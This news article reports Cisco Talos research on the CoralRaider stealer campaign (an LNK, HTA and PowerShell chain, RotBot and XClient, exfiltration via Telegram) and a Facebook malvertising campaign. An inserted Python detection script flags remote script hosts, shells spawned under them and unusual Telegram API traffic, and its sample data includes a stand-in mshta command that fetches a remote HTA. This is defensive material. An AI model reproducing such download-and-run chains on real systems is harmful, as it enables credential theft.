A suspected threat actor of Vietnamese origin has been observed targeting victims in several Asian and Southeast Asian countries with malware designed to collect valuable data since at least May 2023.
Cisco Talos is tracking the cluster under the name CoralRaider, describing it as financially motivated. The campaign's targets include India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam.
“This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertising accounts,” said security researchers Chetan Raghuprasad and Joey Chen. “They use RotBot, a custom variant of Quasar RAT, and the XClient stealer as the payload.”
Other core malware used by the group includes a combination of remote access Trojans and information stealers such as AsyncRAT, NetSupport RAT and Rhadamanthys.
Targeting business and advertising accounts has been of particular interest to attackers operating from Vietnam, with various stealer malware families such as Ducktail, NodeStealer and VietCredCare deployed to take control of accounts for further monetization.
The modus operandi involves using Telegram to exfiltrate stolen information from victims’ machines, which is then traded in underground markets to generate illicit revenue.
“The CoralRaider operators are based in Vietnam, based on the actors’ messages in their C2 Telegram bot channels and language preference in naming their bots, PDB strings and other Vietnamese words encoded in the payload binaries,” the researchers said.
Attack chains begin with a Windows shortcut file (LNK), although there is currently no clear explanation as to how these files are distributed to targets.
If the LNK file is opened, an HTML application (HTA) file is downloaded from an attacker-controlled download server and executed, which, in turn, runs an embedded Visual Basic script.
The script, for its part, decrypts and sequentially executes three other PowerShell scripts that are responsible for performing anti-VM and anti-scanning checks, bypassing Windows User Access Control (UAC), disabling Windows and application notifications, and downloading and running RotBot.
RotBot is configured to contact a Telegram bot, retrieve the XClient stealer malware and execute it in memory, ultimately facilitating the theft of cookies, credentials, and financial information from web browsers such as Brave, Microsoft Edge, Google Chrome, Mozilla Firefox and Opera; Discord and Telegram data; and screenshots.
XClient is also designed to steal data from victims’ Facebook, Instagram, TikTok, and YouTube accounts, gathering details about payment methods and permissions associated with their Facebook business and advertising accounts.
“RotBot is a variant of the Quasar RAT client that the threat actor customized and compiled for this campaign,” the researchers said. “[XClient] has extensive information theft capabilities through its plugin module and various modules to perform remote administrative tasks.”
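The chain described above (LNK, then a remotely fetched HTA, then PowerShell under the script host, then a Telegram bot used as the C2 and exfiltration channel) gives a defender three process- and network-level signals that are cheap to check in endpoint telemetry. The following is an added example, not code from Talos or from the campaign: it runs a small rule set over simplified, Sysmon-like process-create and network-connect records. The `Event` layout, the host and process names, and every sample event are constructed for illustration and are not indicators taken from the report.

```python
"""Detection sketch for a LNK -> HTA -> PowerShell -> Telegram-bot chain.
Added example, not Talos or CoralRaider code; event layout and all sample
events below are constructed for illustration."""
from dataclasses import dataclass
from typing import Dict, List, Optional

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Processes that legitimately reach Telegram; anything else doing so is suspect.
TELEGRAM_CLIENTS = {"telegram.exe", "chrome.exe", "msedge.exe",
                    "firefox.exe", "brave.exe", "opera.exe"}
TELEGRAM_API = "api.telegram.org"


@dataclass
class Event:
    """Minimal process-create / network-connect record (simplified, assumed shape)."""
    kind: str                        # "process" or "network"
    pid: int
    image: str                       # executable basename
    parent_pid: Optional[int] = None
    cmdline: str = ""
    dest_host: str = ""


def ancestry(tree: Dict[int, Event], pid: int) -> List[str]:
    """Return [self, parent, grandparent, ...] image names; cycle-safe."""
    chain, seen = [], set()
    while pid in tree and pid not in seen:
        seen.add(pid)
        chain.append(tree[pid].image.lower())
        pid = tree[pid].parent_pid
    return chain


def detect(events: List[Event]) -> List[str]:
    """Return one alert string per suspicious event, in input order."""
    tree = {e.pid: e for e in events if e.kind == "process"}
    alerts = []
    for e in events:
        img = e.image.lower()
        chain = ancestry(tree, e.pid)
        if e.kind == "process":
            # Stage 1: a script host pulling its HTA/script from a remote URL.
            if img in SCRIPT_HOSTS and "http" in e.cmdline.lower():
                alerts.append(f"remote-script-host pid={e.pid} {img} {e.cmdline}")
            # Stage 2: a shell whose ancestry passes through a script host.
            elif img in SHELLS and any(a in SCRIPT_HOSTS for a in chain[1:]):
                alerts.append(f"shell-under-script-host pid={e.pid} chain={'<-'.join(chain)}")
        elif e.kind == "network":
            # Stage 3: Telegram bot API reached by something that is not a browser or chat client.
            if e.dest_host.lower() == TELEGRAM_API and img not in TELEGRAM_CLIENTS:
                alerts.append(f"telegram-api-from-{img} pid={e.pid} chain={'<-'.join(chain)}")
    return alerts


# Constructed sample telemetry: one malicious chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    Event("process", 100, "explorer.exe"),
    Event("process", 200, "mshta.exe", 100, "mshta.exe http://download.example/loader.hta"),
    Event("process", 300, "powershell.exe", 200, "powershell.exe -NoProfile -File stage1.ps1"),
    Event("process", 400, "svchost-lookalike.exe", 300, ""),
    Event("network", 400, "svchost-lookalike.exe", dest_host="api.telegram.org"),
    Event("process", 500, "chrome.exe", 100),
    Event("network", 500, "chrome.exe", dest_host="api.telegram.org"),   # benign: browser
    Event("process", 600, "mshta.exe", 100, "mshta.exe C:\\Tools\\local.hta"),  # benign: local HTA
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The three rules are deliberately independent: the first fires on the initial download even when later stages are blocked, the second catches the PowerShell stage regardless of how the HTA was delivered, and the third keys on the exfiltration channel, so the Telegram rule still applies if the actor swaps the loader. An allow-list of processes that legitimately talk to the Telegram API is the main tuning knob for the third rule.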
The development comes as Bitdefender revealed details of a malvertising campaign on Facebook that is exploiting the buzz surrounding generative AI tools to push an assortment of information stealers such as Rilide, Vidar, IceRAT and a new entrant known as Nova Stealer.
The starting point of the attack is that the threat actor takes control of an existing Facebook account and modifies its appearance to imitate well-known artificial intelligence tools from Google, OpenAI and Midjourney, expanding its reach by serving sponsored ads on the platform.
One of them, a fake page masquerading as Midjourney, had 1.2 million followers before it was taken down on March 8, 2023. The threat actors running the page were mainly from Vietnam, the US, Indonesia, the UK and Australia, among others.
“The malvertising campaigns have enormous reach across the Meta-sponsored advertising system and have actively targeted European users from Germany, Poland, Italy, France, Belgium, Spain, the Netherlands, Romania, Sweden and elsewhere,” the Romanian cybersecurity company said.